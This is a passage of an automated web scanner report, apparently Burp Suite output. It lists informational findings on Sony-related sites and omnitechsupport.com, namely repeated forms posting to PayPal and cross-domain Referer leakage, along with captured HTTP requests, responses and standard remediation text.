Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

9.10. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.11. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.12. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.13. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.14. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.15. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.16. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.17. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.18. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.19. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.20. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.21. http://www.omnitechsupport.com/fee.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
display
business
cmd

Request

Response

9.22. http://www.omnitechsupport.com/spyware_removal.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/spyware_removal.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
item_number
amount
page_style
no_shipping
no_note
currency_code
lc
bn

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<td valign="top">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr"

method="post">

<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.23. http://www.omnitechsupport.com/spyware_removal.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/spyware_removal.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
display
business
cmd

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<tr>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

10. Cross-domain Referer leakage previous next
There are 12 instances of this issue:

http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php
http://www.facebook.com/plugins/likebox.php
http://www.omnitechsupport.com/sony/index.php
http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView
http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome
https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

10.1. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sonystyle.custhelp.com
Path:	/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Issue detail

The page was loaded from a URL containing a query string:

http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source=

The response contains the following link to another domain:

http://esupport.sony.com/US/perl/model-accessories.pl

Request

GET /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source= HTTP/1.1
Host: sonystyle.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:29 GMT
Server: Apache
RNT-Time: D=91958 t=1308842369134448
RNT-Machine: 06
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15094

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightnow.com/crm/document">
<head>
<script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></scr
...[SNIP]...
<td class="bevel" valign="top" colspan="2">
<a href="http://esupport.sony.com/US/perl/model-accessories.pl" id="click_here" name="click_here">Click here</a>
...[SNIP]...

10.2. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/186140_1481145205_634764_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187225_100002209408909_2774726_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187912_196942217311_3952230_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202909_100002201855098_1458152_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202955_1178794230_6332749_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202967_100001269761876_1508747_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211512_100000329032400_559174_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_1313402717_8830_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/6KGjlCsCWCK.css
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/6KGjlCsCWCK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/cyberghostvpn" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187912_196942217311_3952230_q.jpg" alt="CyberGhost VPN" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hapo06" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202955_1178794230_6332749_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/iqbalisbac" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211512_100000329032400_559174_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Bivolty" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202967_100001269761876_1508747_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002209408909" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187225_100002209408909_2774726_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kingofhawks" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002201855098" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202909_100002201855098_1458152_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_1313402717_8830_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/RuRoller" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186140_1481145205_634764_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

10.3. http://www.omnitechsupport.com/sony/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omnitechsupport.com
Path:	/sony/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.omnitechsupport.com/sony/index.php?queue=ComputerPFS&OWChat=1&VARSET_MODELNUM=VGNNR180E

The response contains the following links to other domains:

http://b2b.sony.com/
http://esupport.sony.com/
http://esupport.sony.com/US/perl/contact-land.pl?template_id=1
http://esupport.sony.com/US/perl/index.pl?template_id=1
http://esupport.sony.com/graphics/site/globalhome.gif
http://esupport.sony.com/graphics/site/logo_small.jpg
http://esupport.sony.com/graphics/site/sonylogo.jpg
http://esupport.sony.com/graphics/site/sonyplay.gif
http://products.sel.sony.com/SEL/legal/notice.html
http://products.sel.sony.com/SEL/legal/privacy.html
http://www.sony.com/index.php?CMP=M:footer:esupport
http://www.sony.net/SonyInfo/Support/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Set-Cookie: model=VGNNR180E; expires=Sat, 23-Jul-2011 14:59:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div id="topleftlogo">
           <img src="http://esupport.sony.com/graphics/site/sonylogo.jpg" width="85" height="15" border="0">
   </div>
...[SNIP]...
<div id="globalhome" ><A HREF="http://esupport.sony.com" onMouseOver=" window.status='Click here to visit Sony Electronics Support and Registration.'; return true" onMouseOut="window.status=' '; return true">
        <img src="http://esupport.sony.com/graphics/site/logo_small.jpg" border="0">
</div>

   <div id="globalhome4" >
       <A HREF="http://esupport.sony.com" onMouseOver=" window.status='Click here to visit Sony Electronics Support and Registration.'; return true" onMouseOut="window.status=' '; return true">Sony Support Home</a>
...[SNIP]...
<div id="bottomlinks">
       <a href="http://www.sony.net/SonyInfo/Support/" target="_self" onMouseOver=" window.status='Go to the Sony Global Home page.'; return true" onMouseOut="window.status=' '; return true" title="Locate Sony Support for other areas of the world."><img src="http://esupport.sony.com/graphics/site/globalhome.gif" width="78" height="9" border="0"></a> 
       <A onmouseover=" window.status='Go to Sony Support.'; return true" onmouseout="window.status=' '; return true" href="http://esupport.sony.com/US/perl/index.pl?template_id=1" target=_self>Support Home</A> 
       <a href="http://esupport.sony.com/US/perl/contact-land.pl?template_id=1" target="_self" onMouseOver=" window.status='Contact Sony Support.'; return true" onMouseOut="window.status=' '; return true">Contact Support</a>
       <A onmouseover=" window.status='Go to Sony.com.'; return true" onmouseout="window.status=' '; return true" href="http://www.sony.com/index.php?CMP=M:footer:esupport" target="_self">Sony.com</A>
...[SNIP]...
</A> 
       <A style="border-right: 0px;" onmouseover=" window.status='Go to Sony Business Solutions.'; return true" onmouseout="window.status=' '; return true" href="http://b2b.sony.com/" target="_self">Business Solutions</A>
...[SNIP]...
<div id="playimgright">
       <a href="http://www.sony.com/index.php?CMP=M:footer:esupport"><img src="http://esupport.sony.com/graphics/site/sonyplay.gif" width="68" height="36" border="0"></a>
...[SNIP]...
<br />
            <a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_self">Privacy Policy/Your California Privacy Rights</a> | <a href="http://products.sel.sony.com/SEL/legal/notice.html" target="_self">Legal/Trademark</a>
...[SNIP]...

10.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?storeId=10151&catalogId=10551&langId=-1&categoryId=8198552921644643900

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://sonyrepairservices.com/
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.docs.sony.com/startchat.asp?chat=1
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.trackitback.com/backstage/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sony.support.com/download/VAIO_PC_Health_Check_EN.exe
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?storeId=10151&catalogId=10551&langId=-1&categoryId=8198552921644643900 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 129492
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:01 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 129492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/Backstage-Services/e
...[SNIP]...

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<p class="serviceDetails secondParagraph">
<a class="redArrowLink" href="https://sony.support.com/download/VAIO_PC_Health_Check_EN.exe">Run VAIO Health Check</a>
...[SNIP]...
<p class="serviceDetails secondParagraph">
<a class="redArrowLink" href="http://www.trackitback.com/backstage/">Learn more</a>
...[SNIP]...
<div class="locatorArea">
<a class="storeListingLink redArrowLink" href="http://www.docs.sony.com/startchat.asp?chat=1">Chat now</a>
...[SNIP]...
etails">
If you have a problem with your hardware, such as your LCD or hard drive, we're the right people to handle it. Most repairs take only 5-7 days from receipt of product. Find out more about our <a href="http://sonyrepairservices.com" target="blank" class="serviceDetailsLink">Sony VAIO Repair Service</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.5. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView?cmsId=smb_landing_page&catalogId=10551&storeId=10151&langId=-1

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://syndication.intel.com/DistributeModule.aspx?id=16972
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
